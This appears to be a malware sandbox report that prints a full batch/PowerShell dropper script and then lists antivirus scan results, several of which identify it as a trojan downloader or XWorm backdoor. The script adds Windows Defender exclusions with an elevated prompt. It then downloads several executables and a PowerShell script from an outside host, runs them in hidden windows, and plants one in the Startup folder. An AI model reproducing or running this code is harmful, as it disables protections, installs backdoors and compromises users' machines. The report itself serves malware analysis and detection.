Static | ZeroBOX
No static analysis available.
<# :batch script
Echo Please wait...
@echo off
setlocal
cd "%~dp0"
powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('%~f0'))"
endlocal
goto:eof
while($true) {
try {
# Step 1: Set exclusions with admin privileges
$excludePath = [System.IO.Path]::GetFullPath($env:USERPROFILE)
$exclusionsCommand = "Add-MpPreference -ExclusionExtension '.exe','.bat','.vbs','.lnk'; Add-MpPreference -ExclusionPath '$excludePath'; Add-MpPreference -ExclusionPath 'C:/Windows'"
Start-Process powershell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command $exclusionsCommand" -Verb runas -Wait
# Step 2: Download and execute the first executable (hidden cmd window)
$url1 = 'https://1drv.media/qz.exe'
$filePath1 = [System.IO.Path]::Combine($env:USERPROFILE, 'qdll.exe')
$downloadCommand1 = "Invoke-WebRequest -Uri '$url1' -OutFile '$filePath1'; Start-Process -FilePath '$filePath1'"
Start-Process powershell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command $downloadCommand1" -WindowStyle Hidden
# Step 3: Download and execute the second file (hidden cmd window)
$url2 = 'https://1drv.media/xc.exe'
$filePath2 = [System.IO.Path]::Combine($env:USERPROFILE, 'XClient.exe')
$downloadCommand2 = "Invoke-WebRequest -Uri '$url2' -OutFile '$filePath2'; Start-Process -FilePath '$filePath2'"
Start-Process powershell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command $downloadCommand2" -WindowStyle Hidden
# Step 4: Download and execute the third file (hidden cmd window)
$url3 = 'https://1drv.media/GwKVGTzF/TGC.exe'
$filePath3 = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup\TGC.exe')
$downloadCommand3 = "Invoke-WebRequest -Uri '$url3' -OutFile '$filePath3'; Start-Process -FilePath '$filePath3'"
Start-Process powershell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command $downloadCommand3" -WindowStyle Hidden
# Step 5: Download and execute the fourth file (hidden cmd window)
$url4 = 'https://1drv.media/TGR.exe'
$filePath4 = [System.IO.Path]::Combine($env:USERPROFILE, 'TGR.exe')
$downloadCommand4 = "Invoke-WebRequest -Uri '$url4' -OutFile '$filePath4'; Start-Process -FilePath '$filePath4'"
Start-Process powershell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command $downloadCommand4" -WindowStyle Hidden
# Step 6: Download and execute the fifth file (hidden cmd window)
$url5 = 'https://1drv.media/TGS.exe'
$filePath5 = [System.IO.Path]::Combine($env:USERPROFILE, 'TGS.exe')
$downloadCommand5 = "Invoke-WebRequest -Uri '$url5' -OutFile '$filePath5'; Start-Process -FilePath '$filePath5'"
Start-Process powershell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command $downloadCommand5" -WindowStyle Hidden
# Step 7: Download and execute the fifth file (hidden cmd window)
$url6 = 'https://1drv.media/clp.ps1' # Replace this with the actual URL of the .ps1 file
$filePath6 = [System.IO.Path]::Combine($env:USERPROFILE, 'clp.ps1') # File path to save the script
$downloadCommand6 = "Invoke-WebRequest -Uri '$url6' -OutFile '$filePath6'; Start-Process -FilePath 'powershell.exe' -ArgumentList '-NoProfile', '-ExecutionPolicy', 'Bypass', '-WindowStyle', 'Hidden', '-File', '$filePath6' -WindowStyle Hidden"
# Execute the PowerShell script with hidden cmd window
Start-Process powershell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command $downloadCommand6" -WindowStyle Hidden
# Step 8: Download and execute the fifth file (hidden cmd window)
$url7 = 'https://1drv.media/cs.exe'
$filePath5 = [System.IO.Path]::Combine($env:USERPROFILE, 'TGS.exe')
$downloadCommand5 = "Invoke-WebRequest -Uri '$url7' -OutFile '$filePath5'; Start-Process -FilePath '$filePath5'"
Start-Process powershell -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command $downloadCommand5" -WindowStyle Hidden
# Exit the loop after successful execution
exit
} catch {
# Optional: Add logging or handling here if needed
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Clean
CMC Clean
ALYac Trojan.GenericKD.74354309
Malwarebytes Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Trojan.Gen.NPE
TrendMicro-HouseCall Backdoor.PS1.XWORM.YXEJTZ
Cynet Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.74354309
F-Secure Clean
VIPRE Trojan.GenericKD.74354309
TrendMicro Backdoor.PS1.XWORM.YXEJTZ
Sophos Clean
huorong Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Microsoft Clean
SUPERAntiSpyware Clean
AhnLab-V3 Clean
Acronis Clean
TACHYON Clean
Zoner Clean
Tencent Win32.Trojan-Downloader.Downloader.Dplw
Yandex Clean
Ikarus Trojan-Downloader.PowerShell.Agent
MaxSecure Clean
Fortinet Clean
alibabacloud Clean
No IRMA results available.